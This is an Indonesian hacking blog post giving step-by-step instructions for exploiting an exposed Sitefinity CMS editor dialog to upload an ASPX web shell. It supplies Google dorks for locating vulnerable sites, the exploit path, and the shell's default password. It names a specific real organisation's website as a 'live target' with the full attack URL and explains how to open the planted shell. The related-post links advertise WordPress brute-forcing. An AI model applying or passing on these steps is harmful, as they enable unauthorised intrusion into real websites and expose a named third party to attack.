Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]

Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v

Langsung Saja...

Bahan :
1. shell aspx => Yang belom punya download disini
   passwordnya : admin

2. Dork : - inurl:"/Sitefinity/login.aspx"
                - "UserControls/Dialogs"
                - "Sitefinity: Login"

3.  Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

4. Dan yang paling Penting => "KESABARAN" :'v


Step By Step :

1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx"
2. Pilih Salah Satu Web Target
    Live Target : http://www.calstart.org/
3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
    Contoh : http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

Maka akan Seperti ini
4. Tinggal Kalian Upload shell aspx nya :'v 
    Tekan "select" => Pilih file upload => "upload selected"
5. Kemungkinan Vuln maka Tampilannya akan Seperti ini

6. Tinggal Buka akses shell kalian :'v
     Akses shell => site.target/Files/nameshell.aspx


Terimakasih Atas Kunjungannya :)

Nitip Nick
=> ./AnChan <=


Sekianlah Postingan Dari ./AnChan tentang "Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]" Semoga Bisa Bermanfaat!.

Komentar

./AnChan

31337FileExists Exploit and Upload Shell

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce